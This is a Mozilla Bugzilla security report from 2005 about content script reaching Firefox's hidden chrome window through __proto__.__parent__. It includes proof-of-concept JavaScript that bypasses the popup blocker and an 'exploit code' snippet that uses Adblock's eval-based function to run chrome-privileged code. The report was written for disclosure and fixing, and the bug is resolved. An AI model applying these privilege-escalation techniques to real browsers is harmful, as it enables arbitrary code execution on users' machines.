Any_XPCOM_Object.anyFunction.__proto__.__parent__ refers to the invisible blank ChromeWindow

RESOLVED FIXED

Status

()

Core
Security
RESOLVED FIXED
12 years ago
10 years ago

People

(Reporter: moz_bug_r_a4, Assigned: jst)

Tracking

({fixed-aviary1.0.5, fixed1.7.9})

Trunk
x86
Windows XP
fixed-aviary1.0.5, fixed1.7.9
Points:
---
Bug Flags:
blocking-aviary1.0.5 +
blocking1.8b3 +
blocking-aviary1.5 +
in-testsuite ?

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:fix] -fixed by 294795. Bug details embargoed until August 1, 2005)

Attachments

(2 attachments, 1 obsolete attachment)

(Reporter)

Description

12 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4

Any_XPCOM_Object.anyFunction.__proto__.__parent__ refers to the invisible blank
ChromeWindow. It is [object ChromeWindow], but its location is "about:blank".
thus, it does *not* have chrome privilege.

There is a exception:
document.open.__proto__.__parent__ refers to document.defaultView


I'm not sure what an attacker can do. but, at least this bug can be used in
order to circumvent the built-in popup blocker.

  window.alert.__proto__.__parent__.location =
    "javascript:window.open('http://www.mozilla.org/')";


Affected:
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518 Firefox/1.0+

(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518

(Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317 Thunderbird/1.0.2
(Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050518 Thunderbird/1.0.4
(Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050518 Thunderbird/1.0+

Note for Thunderbird:
Content script cannot change ChromeWindow.location and cannot call
ChromeWindow.open()


Note:
Firefox and Thunderbird have critical issue that is similar to this bug.
see Bug 294795.


Reproducible: Always

Steps to Reproduce:
(Reporter)

Comment 1

12 years ago
Created attachment 184008 [details]
testcase
(Reporter)

Comment 2

12 years ago
Sorry, I've tested this testcase with local file (file://). Web pages
cannot change ChromeWindow.location.
(Reporter)

Updated

12 years ago
Attachment #184008 - Attachment is obsolete: true
(Reporter)

Comment 3

12 years ago
I've made mistakes. 

When a page's url is https://, a page cannot change ChromeWindow.location.
But, when a page's url is http://, a page *can* change ChromeWindow.location.

testcase with http: url
http://members.tripod.com/cv6y-mlr8-9hh/ct7f-nm8q/open-test-2.html


And, this ChromeWindow is the nsIAppShellService.hiddenDOMWindow.
Assignee: dveditz → jst
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: blocking1.8b3+
Flags: blocking-aviary1.1+
Flags: blocking-aviary1.0.5+
Whiteboard: [sg:fix]
(Reporter)

Comment 4

12 years ago
>When a page's url is https://, a page cannot change ChromeWindow.location.
>But, when a page's url is http://, a page *can* change ChromeWindow.location.

Sorry, this is incorrect. my old testcase is subject to same origin policy.
page A: http://a.a/a.html
page B: http://b.b/b.html
After page A changed hiddenDOMWindow.location, page B cannot access properties
of hiddenDOMWindow.

Content window can call directly hiddenDOMWindow.open(), without side effect.
  window.blur.__proto__.__parent__.open('http://www.mozilla.org/');

Also, the following is possible. (w.opener is hiddenDOMWindow)
  w = window.open.__proto__('http://www.mozilla.org/');


If user installed Adblock, this bug allows an attacker to run arbitrary code.
If Adblock is installed, hiddenDOMWindow contains Adblock's component. and
content window can use functions of Adblock's component.

------
Target code from adblock.jar!/content/component.js:
  function adblockRemoveSlow(node, wnd, immediate, removalCode) {
  	// use timeout to collapse node - otherwise the reflow-queue doesn't catch it
  	// set style + collapse frameset-cols+rows for frames (if specified)
  	if (immediate) (removalCode) ? eval(removalCode) : (node.style.display = "none");
  	else {
  		var nodeIndex = adblockNodeIndex(wnd, node);
  		wnd.setTimeout(
  				"var node = window._AdblockObjects["+nodeIndex+"];\
  				"+  (removalCode ? removalCode : "node.style.display = 'none';")  +"\
  				delete window._AdblockObjects["+nodeIndex+"];", 0); // no content will be
loaded
  	}
  }

Exploit code:
  var code = "alert(location.href + '\\n\\n' + Components.stack);";
  window.blur.__proto__.__parent__
  .adblockRemoveSlow(null, window, false, code);
------

The string passed as the first argument of |wnd.setTimeout| is evaluated in
the context of |wnd|, but it is evaluated with the principal of caller
(adblockRemoveSlow) that has chrome privilege.

I've confirmed that this exploit code works on:
Adblock 0.5.2.039 + Firefox/1.0.4 
Adblock 0.5.2.039 + Firefox/1.0+ (2005-05-31-13)
Adblock 0.5.2.039 + Mozilla/1.7.8
(Reporter)

Comment 5

12 years ago
Created attachment 184972 [details]
window.blur.__proto__.__parent__.open()
(Reporter)

Comment 6

12 years ago
Created attachment 184973 [details]
arbitrary code execution with Adblock

This requires Adblock installed.
(Assignee)

Updated

12 years ago
Depends on: 294795

Updated

12 years ago
Whiteboard: [sg:fix] → [sg:fix] -need patch

Updated

12 years ago
Whiteboard: [sg:fix] -need patch → [sg:fix] -fixed by 294795
(Reporter)

Comment 7

12 years ago
I guess this should not be made public, until Bug 297543 is resolved.
(Assignee)

Comment 8

12 years ago
Marking FIXED now that bug 294795 is fixed.
Status: NEW → RESOLVED
Last Resolved: 12 years ago
Keywords: fixed-aviary1.0.5, fixed1.7.9
Resolution: --- → FIXED
Adding distributors
Whiteboard: [sg:fix] -fixed by 294795 → [sg:fix] -fixed by 294795. Bug details embargoed until July 20, 2005
Whiteboard: [sg:fix] -fixed by 294795. Bug details embargoed until July 20, 2005 → [sg:fix] -fixed by 294795. Bug details embargoed until August 1, 2005
Group: security

Updated

12 years ago
Flags: testcase+

Updated

10 years ago
Flags: in-testsuite+ → in-testsuite?
You need to log in before you can comment on or make changes to this bug.